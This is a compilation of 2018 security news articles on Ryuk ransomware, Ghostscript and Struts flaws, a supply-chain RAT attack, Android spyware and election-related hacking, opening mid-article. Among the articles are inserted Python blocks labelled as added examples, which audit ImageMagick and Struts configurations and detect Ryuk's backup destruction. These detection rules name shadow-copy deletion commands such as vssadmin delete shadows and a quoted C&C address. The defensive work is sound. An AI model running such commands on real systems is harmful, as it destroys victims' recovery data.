Almost all of the observed Ryuk ransomware samples, the security researchers say, were provided with a unique wallet. Shortly after the victim paid the ransom, the attackers divided the funds and transmitted them through multiple accounts.

“We were able to spot a connection between these wallets, as funds paid to them were transferred to several key wallets at a certain point. This may indicate that a coordinated operation, in which several companies have been carefully targeted, is currently taking place using the Ryuk ransomware,” Check Point says.

Unpatched Ghostscript Vulnerabilities Impact Popular Software
23.8.2018 securityweek

Ghostscript Impacted by Multiple -dSAFER Sandbox Bypass Vulnerabilities

Unpatched vulnerabilities in Ghostscript impact a broad range of popular software products, including several Linux distributions, CERT/CC reveals in a Tuesday alert.

Ghostscript, a suite of software based on an interpreter for Adobe's PostScript and PDF page description languages, is widely used across stand-alone and web applications, including packages such as GIMP and ImageMagick.

As with other highly popular software, vulnerabilities in Ghostscript are valuable to both cybercriminals and threat actors, and such flaws have already been abused by North Korea-linked hackers.

Now, Google Project Zero security researcher Tavis Ormandy says that Ghostscript is impacted by multiple critical vulnerabilities and that “ImageMagick, Evince, GIMP, and most other PDF/PS tools” are impacted as well.

In addition to several -dSAFER sandbox escapes reported a few years ago, the popular interpreter is also impacted by “a few file disclosure, shell command execution, memory corruption and type confusion bugs,” the researcher says.

Although there is a -dSAFER option to prevent unsafe PostScript operations, there are numerous operations that bypass the protections provided by -dSAFER, thus allowing an attacker to execute arbitrary commands with arbitrary arguments, the CERT/CC warns.

In their alert, CERT/CC notes not only that there are multiple -dSAFER sandbox bypass vulnerabilities impacting Ghostscript, but also that these are inherited in all applications that leverage the interpreter. These flaws could be exploited by an unauthenticated attacker for remote command execution.

Artifex Software, ImageMagick, Red Hat, and Ubuntu products have already been found to be affected, but other products might be impacted as well. Thus, CERT/CC decided to warn all major software companies about the issue.

One mitigation, Ormandy notes, is to disable all the Ghostscript coders in ImageMagick’s policy.xml. CERT/CC likewise advises using the policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content.
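A quick way to verify that the policy.xml mitigation is actually in place is to parse the file and list which Ghostscript-backed coders it still leaves enabled. The block below is an added example, not ImageMagick’s or CERT/CC’s code: it uses ImageMagick’s standard `<policy domain="coder" rights="none" pattern="…"/>` syntax, and the weak and hardened policies are constructed samples. It also checks PS2 and PS3, two further ImageMagick PostScript coder names not mentioned in the article, since a pattern of “PS” does not cover them.

```python
"""Audit an ImageMagick policy.xml for the CERT/CC mitigation: coder policies
that deny the PostScript-family formats Ghostscript would otherwise render.

Added example, not ImageMagick's or CERT/CC's code. The policy element syntax
is ImageMagick's standard format; both sample documents are constructed.
"""
import xml.etree.ElementTree as ET

# Coders handed to the Ghostscript delegate. PS/EPS/PDF/XPS are named in the
# alert; PS2 and PS3 are additional ImageMagick coder names added here because
# a pattern of "PS" does not match them.
GS_CODERS = ("PS", "PS2", "PS3", "EPS", "PDF", "XPS")

# Constructed sample: the stock-looking policy that leaves every GS coder on.
WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
</policymap>"""

# Constructed sample: the same policy with the recommended coder denials added.
HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>"""


def coder_rights(policy_xml: str) -> dict:
    """Map each coder pattern (upper-cased) to its rights string, e.g. 'none'
    or 'read|write'. Non-coder domains (resource, path, ...) are ignored."""
    root = ET.fromstring(policy_xml)
    rights = {}
    for pol in root.iter("policy"):
        if pol.get("domain") == "coder" and pol.get("pattern"):
            rights[pol.get("pattern").upper()] = (pol.get("rights") or "").lower()
    return rights


def still_enabled_gs_coders(policy_xml: str) -> list:
    """Return the Ghostscript-backed coders this policy does NOT deny.
    A coder counts as denied only when its rights are exactly 'none'; a
    wildcard '*' pattern with rights='none' denies everything at once."""
    rights = coder_rights(policy_xml)
    if rights.get("*") == "none":
        return []
    return [c for c in GS_CODERS if rights.get(c) != "none"]


def is_hardened(policy_xml: str) -> bool:
    """True when no Ghostscript-backed coder remains enabled."""
    return not still_enabled_gs_coders(policy_xml)


def audit_file(path: str) -> list:
    """Convenience wrapper for a real policy.xml on disk (e.g. /etc/ImageMagick-6/policy.xml)."""
    with open(path, encoding="utf-8") as fh:
        return still_enabled_gs_coders(fh.read())


if __name__ == "__main__":
    print("weak policy leaves enabled:", still_enabled_gs_coders(WEAK_POLICY))
    print("hardened policy leaves enabled:", still_enabled_gs_coders(HARDENED_POLICY))
```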

“In the short term the advice for distribution to start disabling PS, EPS, PDF and XPS coders by default is the only defense until a fix is available,” Stephen Giguere, Sales Engineer at Synopsys, confirms in an emailed statement for SecurityWeek.

“Ghostscript is used pretty much everywhere and has been for a very long time. Packages like GIMP (a Photoshop alternative) but more important for web applications, ImageMagick are prevalent to the extent of being standard for the processing of PDF files. This exploit has the potential for file system access leading to sensitive data leak and more as it can be the beachhead opportunity for a more comprehensive data breach,” Giguere says.

Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.2018 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to.”

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states protect against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The attempt on the DNC wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.

Microsoft Releases Intel Microcode Patches for Foreshadow Flaws
23.8.2018 securityweek

Microsoft this week made available another round of microcode updates created by Intel for mitigating the recently disclosed speculative execution vulnerabilities tracked as Foreshadow and L1 Terminal Fault (L1TF).

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

Malicious code running on a vulnerable system can exploit the flaws to read potentially sensitive data from memory that is supposed to be protected, whether by an SGX enclave, by the operating system and SMM, or by a hypervisor. The security holes affect Intel’s Xeon and Core processors.

Intel and other major tech firms have released mitigations which, in combination with the patches released previously for Meltdown, Spectre and other speculative execution vulnerabilities, should prevent attacks.

Microsoft this week released five new updates: KB4346084, KB4346085, KB4346086, KB4346087 and KB4346088. They deliver Intel’s microcode patches for Windows 10 Release To Market (RTM), Windows 10 version 1709 (Fall Creators Update), Windows Server 2016 version 1709 (Server Core), Windows 10 Version 1703 (Creators Update), Windows 10 version 1607 (Anniversary Update), Windows Server 2016, Windows 10 version 1803 (April 2018 Update), and Windows Server version 1803 (Server Core).

The microcode updates are for devices with Skylake, Kaby Lake and Coffee Lake processors, and they resolve Spectre Variant 3a (CVE-2018-3640), Spectre Variant 4 (CVE-2018-3639), and the Foreshadow flaws (CVE-2018-3615, CVE-2018-3620, CVE-2018-3646).

The mitigations for the Foreshadow vulnerabilities should not have a noticeable performance impact on consumer PCs, but performance degradation may be seen on some data center workloads.

According to Microsoft, patching the Foreshadow vulnerabilities may require both software and firmware (microcode) updates, depending on how the system is configured. However, the company says most devices running Windows client operating systems will only need software updates for protection.

Facebook Suspends Hundreds of Apps Over Data Concerns
23.8.2018 securityweek

Facebook on Wednesday said it has suspended more than 400 of the thousands of applications it has investigated to determine whether people's personal information was being improperly shared.

Applications were suspended "due to concerns around the developers who built them or how the information people chose to share with the app may have been used," vice president of product partnerships Ime Archibong said in a blog post.

Apps put on hold at the social network were being scrutinized more closely, according to Archibong.

Facebook’s app investigation, launched in March, stemmed from the Cambridge Analytica data privacy scandal.

Facebook admitted that up to 87 million users may have had their data hijacked by Cambridge Analytica, which was working for Donald Trump's 2016 presidential campaign.

Archibong said that a myPersonality app was banned by the social network for not agreeing to an audit and "because it's clear that they shared information with researchers as well as companies with only limited protections in place."

Facebook planned to notify the approximately four million members of the social network who shared information with myPersonality, which was active mostly prior to 2012, according to Archibong.

Facebook has modified app data sharing policies since the Cambridge Analytica scandal.

"We will continue to investigate apps and make the changes needed to our platform to ensure that we are doing all we can to protect people’s information," Archibong said.

Britain's data regulator said last month that it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.

The Information Commissioner's Office began investigating the social media giant earlier this year due to the Cambridge Analytica data mishandling.

Cambridge Analytica has denied accusations and has filed for bankruptcy in the United States and Britain.

Silicon Valley-based Facebook last month acknowledged it faces multiple inquiries from regulators about the Cambridge Analytica user data scandal.

Facebook chief Mark Zuckerberg apologized to the European Parliament in May and said the social media giant is taking steps to prevent such a breach from happening again.

Zuckerberg was grilled about the breach in US Congress in April.

North Korea-linked Ryuk Ransomware used in a targeted campaign
23.8.2018 securityaffairs

Check Point reported that organizations worldwide have been targeted with the Ryuk ransomware, which it links to the HERMES malware attributed to a North Korea-linked threat actor.
Security experts from Check Point have uncovered a ransomware campaign aimed at organizations around the world and possibly conducted by a North Korea-linked threat actor.

The campaign appears targeted and well planned: the attackers hit several enterprises and encrypted hundreds of PCs, storage systems and data centers in each infected company.

Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files; Check Point confirms that the ransoms paid by victims ranged between 15 and 50 BTC.

At least three organizations, in the United States and elsewhere, have been severely affected, and the attackers are estimated to have netted over $640,000 to date.

The malicious code used in the attacks is tracked as Ryuk; it appears connected to the HERMES malware previously associated with the notorious Lazarus APT group.

“Curiously, our research led us to connect the nature of Ryuk’s campaign and some of its inner-workings to the HERMES ransomware, a malware commonly attributed to the notorious North Korean APT Lazarus Group, which was also used in massive targeted attacks.” reads the analysis published by Check Point.

“This leads us to believe that the current wave of targeted attacks using Ryuk may either be the work of the HERMES operators, the allegedly North Korean group, or the work of an actor who has obtained the HERMES source code.”

The HERMES ransomware was first spotted in October 2017 when it was involved in a targeted attack against the Far Eastern International Bank (FEIB) in Taiwan.

Of course, we cannot exclude that another attacker in possession of the HERMES source code used it to develop Ryuk.

Experts highlighted that the encryption scheme of the Ryuk ransomware was built specifically for small-scale operations.

“Unlike the common ransomware, systematically distributed via massive spam campaigns and exploit kits, Ryuk is used exclusively for tailored attacks. In fact, its encryption scheme is intentionally built for small-scale operations, such that only crucial assets and resources are infected in each targeted network with its infection and distribution carried out manually by the attackers.” continues the report.

Experts found many similarities between the encryption logic implemented in Ryuk’s code and that of the HERMES ransomware.

Continuing the analysis, the experts discovered that both ransomware families use nearly identical droppers.

When executed, Ryuk sleeps for several seconds, checks whether it was launched with a specific argument, and then kills more than 40 processes and over 180 services associated with antivirus, database, backup and document-editing software.

The ransomware destroys its encryption key and deletes shadow copies and various backup files from disk in order to prevent victims from recovering their files.

It is interesting to note that almost all of the Ryuk samples analyzed by the experts came with a unique wallet. Once a victim had paid the ransom, the attackers split the funds and moved them through multiple accounts.

“From the exploitation phase through to the encryption process and up to the ransom demand itself, the carefully operated Ryuk campaign is targeting enterprises that are capable of paying a lot of money in order to get back on track.” concludes Check Point.

“Both the nature of the attack and the malware’s own inner workings tie Ryuk to the HERMES ransomware and arouse curiosity regarding the identity of the group behind it and its connection to the Lazarus Group.” Check Point says.

Expert discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776)
23.8.2018 securityaffairs

Maintainers of the Apache Struts 2 open source development framework have released security updates to address a critical remote code execution vulnerability.
Security updates released this week for the Apache Struts 2 open source development framework addressed a critical RCE tracked as CVE-2018-11776.

The vulnerability affects Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Struts 2.3.35 and 2.5.17 include the security updates that address CVE-2018-11776.

Struts developers also published a temporary workaround, but they recommend against relying on it and urge users to install the updates instead.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.” reads the security advisory published by Apache.

Experts warn that the RCE flaw can be triggered when no namespace value is set for a result defined in the underlying XML configuration and, at the same time, the configuration of its upper action(s) has no namespace or a wildcard namespace.

The flaw can also be exploited when a url tag has no value and action set and, at the same time, the configuration of its upper action(s) has no namespace or a wildcard namespace.

The vulnerability was reported by Man Yue Mo of the Semmle Security Research team on April 10; security updates were released on June 25, and the new versions of Struts were released on 22 August 2018.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors” reads the technical analysis published by Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
Your application’s Struts configuration file contains an <action …> tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”

The experts from Semmle explained that the flaw affects commonly used Struts endpoints that are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.
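
The two preconditions Semmle describes can be checked mechanically. The following is an added example written for this page (not Apache or Semmle code): it audits a struts.xml for the alwaysSelectFullNamespace flag combined with packages that carry no namespace or a wildcard one, and it screens request paths for an injected namespace carrying an OGNL expression. The sample struts.xml is constructed for illustration. Two assumptions: in struts.xml the namespace attribute sits on <package>, which is where the audit looks (applications using the Convention plugin get alwaysSelectFullNamespace=true by default and declare namespaces in code, so the XML audit does not cover them), and the injected namespace is assumed to show up as ${...} or %{...} in a path segment, possibly URL-encoded.

```python
"""Audit a Struts 2 XML configuration for the CVE-2018-11776 preconditions and
screen request paths for the namespace-injection vector. Added example; the
sample struts.xml is constructed."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Constructed struts.xml: the full-namespace flag is on, one package has a
# wildcard namespace, one has none at all, and one is properly scoped.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="public" extends="struts-default" namespace="/*">
    <action name="help">
      <result>/help.jsp</result>
    </action>
  </package>
  <package name="admin" extends="struts-default">
    <action name="login" class="example.LoginAction">
      <result name="success">/home.jsp</result>
    </action>
  </package>
  <package name="api" extends="struts-default" namespace="/api">
    <action name="status" class="example.StatusAction">
      <result>/status.jsp</result>
    </action>
  </package>
</struts>
"""


def always_select_full_namespace(root):
    """True when struts.xml sets struts.mapper.alwaysSelectFullNamespace=true.
    The Convention plugin turns this on by default outside struts.xml."""
    for const in root.iter("constant"):
        if const.get("name") == "struts.mapper.alwaysSelectFullNamespace":
            return const.get("value", "").strip().lower() == "true"
    return False


def exposed_actions(struts_xml):
    """Return (package, action, namespace) triples for actions whose package
    has no namespace or a wildcard one while the full-namespace flag is on.
    In struts.xml the namespace attribute lives on <package>, so that is what
    is inspected."""
    root = ET.fromstring(struts_xml)
    if not always_select_full_namespace(root):
        return []
    findings = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns is None or ns.strip() == "" or "*" in ns:
            for action in pkg.findall("action"):
                findings.append((pkg.get("name"), action.get("name"), ns))
    return findings


# An injected namespace carries an OGNL expression, ${...} or %{...}, in a
# path segment; a legitimate namespace never does.
OGNL_IN_PATH = re.compile(r"[$%]\{")


def suspicious_request_path(url_path):
    """True when any path segment before the action name holds an OGNL
    expression, after double URL-decoding to catch %2524%257B-style encoding."""
    path = url_path.split("?", 1)[0]
    decoded = unquote(unquote(path))
    segments = decoded.split("/")
    return any(OGNL_IN_PATH.search(seg) for seg in segments[:-1])
```

Running exposed_actions over the sample reports the help and login actions (wildcard and missing namespace respectively) and nothing for the /api package; flipping the constant to false empties the list, which is exactly why the Convention plugin's default matters. The path screen is a WAF- or log-side complement, not a substitute for upgrading to 2.3.35 or 2.5.17.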

Apache Struts flaws are very dangerous for organizations: one of them was the root cause of the massive Equifax breach that impacted over 140 million people.

Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.2018 securityaffairs BigBrothers

Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
Operation Red Signature delivered a remote access Trojan (RAT) that the attackers used to steal sensitive information from the victims.

Threat actors compromised the update server of a remote support solutions provider; through this scheme the hackers infected the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid digital certificate that had been stolen; the attackers also changed the configuration of the update server so that the malware was delivered only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April and used it to sign the malicious update files, which they then uploaded to their own servers.

Then the hackers compromised the server used to deliver the update and configured it to retrieve a file from a server under their control.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

Hackers used the tools to steal data stored on their targets’ web servers and databases.

“The file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”

The analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 2018, and the configuration files inside it were created on July 18, the same day the remote support program’s update process started. The experts also noticed that the 9002 RAT used in this supply chain attack was set to go inactive in August.

The RAT can fetch a long list of hacking tools. Here are the files that 9002 RAT retrieves and delivers to the affected system:

Filename        Tool                                        Purpose
dsget.exe       DsGet                                       View Active Directory objects
dsquery.exe     DsQuery                                     Search for Active Directory objects
sharphound.exe  SharpHound                                  Collect Active Directory information
aio.exe         All In One (AIO)                            Publicly available hack tool
ssms.exe        SQL password dumper                         Dump passwords from SQL database
printdat.dll    RAT (PlugX variant)                         Remote access tool
w.exe           IIS 6 WebDav exploit tool                   Exploit tool for CVE-2017-7269 (IIS 6)
Web.exe         WebBrowserPassView                          Recover passwords stored by the browser
smb.exe         Scanner                                     Scans the system’s Windows version and computer name
m.exe           Custom Mimikatz (32-bit and 64-bit files)   Verify computer password and Active Directory credentials

“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and their clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affect the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.
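
Two of the behaviours described on this page are detectable from process-creation and network telemetry: Ryuk’s pre-encryption clean-up from the Check Point article above (shadow-copy and backup deletion, then a burst of service and process kills) and the Red Signature loader described here (regsvr32 executing a DLL from an application folder, followed by a connection to the reported C&C). The block below is an added example written for this page, not Check Point or Trend Micro code, and it serves both passages. The event records, host names and file paths are constructed. The specific command lines matched for backup destruction (vssadmin, wmic, wbadmin, bcdedit) are assumptions about common tooling; the page states only that Ryuk deletes shadow copies and backup files. The C&C address is the one quoted from the Trend Micro analysis.

```python
"""Behavioural detections for Ryuk's pre-encryption clean-up and the
Operation Red Signature loader, run over constructed events. Added example."""
import re
from collections import defaultdict

# C&C address quoted in the Trend Micro analysis of the 9002 RAT.
C2_INDICATORS = {"66.42.37.101"}

# Assumed command lines for shadow-copy and backup destruction; the page only
# states that Ryuk deletes shadow copies and backup files.
BACKUP_DESTRUCTION = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I),
]
# Service/process termination; a burst from one host is the "40 processes and
# 180 services" behaviour, while a single stop is routine administration.
KILL_COMMAND = re.compile(r"^(net1?(\.exe)?\s+stop|sc(\.exe)?\s+stop|taskkill(\.exe)?)\b", re.I)
KILL_STORM_THRESHOLD = 5
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Constructed Sysmon-style events; host names and paths are illustrative.
EVENTS = [
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\net.exe",
     "cmd": 'net stop "SQL Server (MSSQLSERVER)" /y'},
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net stop VeeamBackupSvc /y"},
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net stop MSExchangeIS /y"},
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmd": "taskkill /F /IM sqlservr.exe"},
    {"host": "FS01", "type": "process", "image": r"C:\Windows\System32\taskkill.exe",
     "cmd": "taskkill /F /IM winword.exe"},
    {"host": "WS07", "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Program Files\RemoteSupport\rcview40u.dll"},
    {"host": "WS07", "type": "network", "image": r"C:\Windows\System32\regsvr32.exe",
     "dst": "66.42.37.101", "dport": 443},
    {"host": "WS09", "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},  # benign registration
    {"host": "WS09", "type": "process", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net stop Spooler"},                                  # one stop is normal
]


def _dll_argument(cmd):
    """Pull the DLL path out of a regsvr32 command line (None if absent)."""
    m = re.search(r"([a-z]:\\.*?\.dll)", cmd, re.I)
    return m.group(1) if m else None


def detect(events):
    """Apply the rules in event order and return sorted (host, rule) findings."""
    findings = set()
    kills = defaultdict(int)
    for ev in events:
        host, image = ev["host"], ev["image"].lower()
        if ev["type"] == "process":
            cmd = ev["cmd"]
            if any(p.search(cmd) for p in BACKUP_DESTRUCTION):
                findings.add((host, "backup_destruction"))
            if KILL_COMMAND.match(cmd):
                kills[host] += 1
            if image.endswith("regsvr32.exe"):
                dll = _dll_argument(cmd)
                if dll and not dll.lower().startswith(SYSTEM_DIRS):
                    findings.add((host, "regsvr32_nonsystem_dll"))
        elif ev["type"] == "network":
            if ev["dst"] in C2_INDICATORS:
                findings.add((host, "c2_beacon"))
            # Loader pattern: a regsvr32 that registered a non-system DLL on
            # this host is now talking to the network.
            if image.endswith("regsvr32.exe") and (host, "regsvr32_nonsystem_dll") in findings:
                findings.add((host, "loader_beacon"))
    for host, count in kills.items():
        if count >= KILL_STORM_THRESHOLD:
            findings.add((host, "service_kill_storm"))
    return sorted(findings)


if __name__ == "__main__":
    for host, rule in detect(EVENTS):
        print(host, rule)
```

The loader rule deliberately does not depend on the signature of the DLL: the Red Signature payload carried a valid signature from a stolen certificate, so "signed" cannot be the trust decision. What stands out is regsvr32 loading a DLL from an application folder and then opening a network connection, which the rule correlates per host; the kill-storm rule likewise triggers on volume rather than on any single command.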

Bitdefender spotted Triout, a new powerful Android Spyware Framework
23.8.2018 securityaffairs Android

Security researchers from Bitdefender have spotted a new Android spyware framework, dubbed Triout, that could be used to build malware with extensive surveillance capabilities.
Bitdefender researchers identified the new spyware framework, which can be embedded in Android applications to spy on their users; it is tracked as Triout and first appeared in the wild on May 15.

The researchers revealed that the command and control (C&C) server has been running since May 2018 and was still up and running at the time of the report.

Triout was first submitted to VirusTotal on May 15; although the first sample was uploaded from Russia, most of the others came from Israel.

The malware was likely spread through third-party marketplaces or domains controlled by the attackers that host the malicious code.

“Discovered by Bitdefender’s machine learning algorithms on 20.07.2018, the sample’s first appearance seems to be 15.05.2018, when it was uploaded to VirusTotal. The application seems to be a repackaged version of “com.xapps.SexGameForAdults” (MD5: 51df2597faa3fce38a4c5ae024f97b1c) and the tainted .apk file is named 208822308.apk.” reads the report published by Bitdefender.

“The original app seems to have been available in Google Play in 2016, but it has since been removed. While it’s unclear how the tainted sample is being disseminated, third-party marketplaces or some other attacker-controlled domains are likely used to host the sample.”

Bitdefender pointed out that the analyzed sample was unobfuscated, a circumstance that leads the experts to believe the framework may be a work in progress.

“This could suggest the framework may be a work-in-progress, with developers testing features and compatibility with devices,” continues the report.

The Triout spyware was discovered by analyzing a tainted application that retained all of the original app’s features. The sample analyzed by Bitdefender was a repackaged version of an adult application that was listed in Google Play in 2016 but has since been removed, which suggests the attackers distributed it through third-party channels.

Triout implements extensive surveillance capabilities, including:

Records every phone call (the conversation itself, as a media file) and sends it, together with the caller ID, to the C&C (incall3.php and outcall3.php)
Logs every incoming SMS message (body and sender) to the C&C (script3.php)
Can hide itself
Can send all call logs (“content://call_log/calls”: callname, callnum, calldate, calltype, callduration) to the C&C (calllog.php)
Whenever the user snaps a picture, with either the front or the rear camera, it is sent to the C&C (uppc.php, finpic.php or reqpic.php)
Can send GPS coordinates to the C&C (gps3.php)
Technical details are included in the report published by Bitdefender.

Iran-Linked Influence Campaign Targets US, Others
22.8.2018 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

